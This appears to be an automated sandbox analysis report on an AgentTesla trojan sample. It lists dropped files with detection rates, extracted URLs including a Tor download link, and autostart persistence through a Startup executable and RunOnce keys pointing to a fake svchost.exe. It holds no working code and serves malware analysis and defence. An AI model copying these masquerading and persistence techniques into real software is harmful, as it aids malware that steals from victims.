                      C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe44%ReversingLabsWin32.Trojan.AgentTesla
                      C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe44%ReversingLabsWin32.Trojan.AgentTesla

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.jiyu-kobo.co.jp/curs0%Avira URL Cloudsafe
                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/H.0%Avira URL Cloudsafe
                      http://www.sandoll.co.krlea0%Avira URL Cloudsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://www.sandoll.co.kropyw2-0%Avira URL Cloudsafe
                      http://www.fonts.comc0%URL Reputationsafe
                      https://mhconsultores.net.ve/0%Avira URL Cloudsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      http://en.w0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.founder.com.cn/cn/0%URL Reputationsafe
                      http://www.sandoll.co.krB20%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/c.0%Avira URL Cloudsafe
                      https://dynamic.t0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/Y0/0%URL Reputationsafe
                      http://www.microsoftc.0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://www.fontbureau.comicva0%Avira URL Cloudsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/5.0%Avira URL Cloudsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                      http://www.tiro.comnm0%Avira URL Cloudsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      https://sectigo.com/CPS0C0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.founder.com.cn/cnf0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.fontbureau.comue0%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
                      https://activity.windows.comr0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://www.sajatypeworks.comnt0%Avira URL Cloudsafe
                      http://www.fontbureau.comm0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.jiyu-kobo.co.jp/cursVknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpfalse
                        high
                        https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpfalse
                          high
                          https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000B.00000003.307917223.0000021F0B447000.00000004.00000001.sdmpfalse
                            high
                            https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                              high
                              http://www.fontbureau.com/designersVknMvPoCXZ.exe, 00000001.00000003.251876624.00000000055DD000.00000004.00000001.sdmpfalse
                                high
                                http://www.sajatypeworks.comVknMvPoCXZ.exe, 00000001.00000003.245404887.00000000055EB000.00000004.00000001.sdmp, VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000B.00000003.308621783.0000021F0B45A000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/cTheVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/H.VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.sandoll.co.krleaVknMvPoCXZ.exe, 00000001.00000003.246740797.00000000055D6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.galapagosdesign.com/DPleaseVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.urwpp.deDPleaseVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.nirsoft.net/AdvancedRun.exe, AdvancedRun.exe, 00000007.00000000.273104698.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.zhongyicts.com.cnVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameVknMvPoCXZ.exe, 00000001.00000000.402866730.00000000026E1000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.bingmapsportal.comsvchost.exe, 0000000B.00000002.309883940.0000021F0B413000.00000004.00000001.sdmpfalse
                                            high
                                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipVknMvPoCXZ.exe, 00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.sandoll.co.kropyw2-VknMvPoCXZ.exe, 00000001.00000003.246740797.00000000055D6000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://www.fonts.comcVknMvPoCXZ.exe, 00000001.00000003.245502248.00000000055EB000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000B.00000003.308834752.0000021F0B445000.00000004.00000001.sdmpfalse
                                              high
                                              https://mhconsultores.net.ve/svchost.exefalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpfalse
                                                high
                                                http://crl.ver)svchost.exe, 00000004.00000002.563938277.0000028D9A40F000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                low
                                                http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sVknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000B.00000002.309883940.0000021F0B413000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://%s.xboxlive.comsvchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  low
                                                  https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://en.wVknMvPoCXZ.exe, 00000001.00000003.244837348.000000000082D000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.carterandcone.comlVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.founder.com.cn/cn/VknMvPoCXZ.exe, 00000001.00000003.248063336.00000000055D4000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.sandoll.co.krB2VknMvPoCXZ.exe, 00000001.00000003.246740797.00000000055D6000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers/frere-jones.htmlVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.jiyu-kobo.co.jp/c.VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://dynamic.tsvchost.exe, 0000000B.00000003.307917223.0000021F0B447000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.308621783.0000021F0B45A000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/Y0/VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.microsoftc.VknMvPoCXZ.exe, 00000001.00000003.248063336.00000000055D4000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000B.00000003.308621783.0000021F0B45A000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://www.fontbureau.com/designersGVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://www.fontbureau.com/designers/?VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://www.founder.com.cn/cn/bTheVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://ocsp.sectigo.com0VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.fontbureau.comicvaVknMvPoCXZ.exe, 00000001.00000000.483452805.00000000055D0000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://www.fontbureau.com/designers?VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://www.tiro.comVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://www.jiyu-kobo.co.jp/5.VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.goodfont.co.krVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.tiro.comnmVknMvPoCXZ.exe, 00000001.00000003.245836341.00000000055EB000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://www.typography.netDVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.galapagosdesign.com/staff/dennis.htmVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://fontfabrik.comVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://sectigo.com/CPS0CVknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://sectigo.com/CPS0DVknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.fonts.comVknMvPoCXZ.exe, 00000001.00000003.245502248.00000000055EB000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://www.sandoll.co.krVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.founder.com.cn/cnfVknMvPoCXZ.exe, 00000001.00000003.247610045.000000000560D000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.sakkal.comVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.apache.org/licenses/LICENSE-2.0VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.fontbureau.comVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            http://www.fontbureau.comueVknMvPoCXZ.exe, 00000001.00000000.483452805.00000000055D0000.00000004.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://sectigo.com/CPS0VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.fontbureau.com/designers19VknMvPoCXZ.exe, 00000001.00000003.251440194.00000000055D9000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://activity.windows.comrsvchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://www.jiyu-kobo.co.jp/jp/VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000B.00000003.307917223.0000021F0B447000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tVknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://www.fontbureau.com/designers/cabarga.htmlNVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://www.founder.com.cn/cnVknMvPoCXZ.exe, 00000001.00000003.247610045.000000000560D000.00000004.00000001.sdmp, VknMvPoCXZ.exe, 00000001.00000003.247622790.00000000055D4000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yVknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://www.sajatypeworks.comntVknMvPoCXZ.exe, 00000001.00000003.245404887.00000000055EB000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://www.fontbureau.commVknMvPoCXZ.exe, 00000001.00000000.483452805.00000000055D0000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://www.jiyu-kobo.co.jp/VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.fontbureau.com/designers8VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://activity.windows.comsvchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://%s.dnet.xboxlive.comsvchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  low

                                                                                                                  Contacted IPs

                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs

                                                                                                                  Public

                                                                                                                  IPDomainCountryFlagASNASN NameMalicious

                                                                                                                  Private

                                                                                                                  IP
                                                                                                                  192.168.2.1
                                                                                                                  127.0.0.1

                                                                                                                  General Information

                                                                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                  Analysis ID:483863
                                                                                                                  Start date:15.09.2021
                                                                                                                  Start time:15:19:29
                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                  Overall analysis duration:0h 16m 6s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:light
                                                                                                                  Sample file name:VknMvPoCXZ (renamed file extension from none to exe)
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                  Number of analysed new started processes analysed:83
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • HDC enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.adwa.expl.evad.winEXE@113/58@0/2
                                                                                                                  EGA Information:Failed
                                                                                                                  HDC Information:
                                                                                                                  • Successful, ratio: 100% (good quality ratio 95.8%)
                                                                                                                  • Quality average: 83%
                                                                                                                  • Quality standard deviation: 25.9%
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 89%
                                                                                                                  • Number of executed functions: 0
                                                                                                                  • Number of non-executed functions: 0
                                                                                                                  Cookbook Comments:
                                                                                                                  • Adjust boot time
                                                                                                                  • Enable AMSI
                                                                                                                  Warnings:
                                                                                                                  Show All
                                                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe
                                                                                                                  • Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.35.236.56, 93.184.220.29, 20.199.120.85, 20.82.209.183, 20.189.173.21, 20.199.120.151, 20.199.120.182, 20.189.173.22, 20.42.73.29, 52.182.143.212, 52.168.117.173
                                                                                                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, cs9.wac.phicdn.net, onedsblobprdwus17.westus.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, arc.trafficmanager.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                  Simulations

                                                                                                                  Behavior and APIs

                                                                                                                  TimeTypeDescription
                                                                                                                  15:20:34API Interceptor4x Sleep call for process: svchost.exe modified
                                                                                                                  15:20:35API Interceptor1x Sleep call for process: VknMvPoCXZ.exe modified
                                                                                                                  15:20:50API Interceptor377x Sleep call for process: powershell.exe modified
                                                                                                                  15:20:50AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  15:21:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404B C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe
                                                                                                                  15:21:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404B C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe
                                                                                                                  15:21:22API Interceptor2x Sleep call for process: 481F404B.exe modified
                                                                                                                  15:21:33API Interceptor1x Sleep call for process: WerFault.exe modified
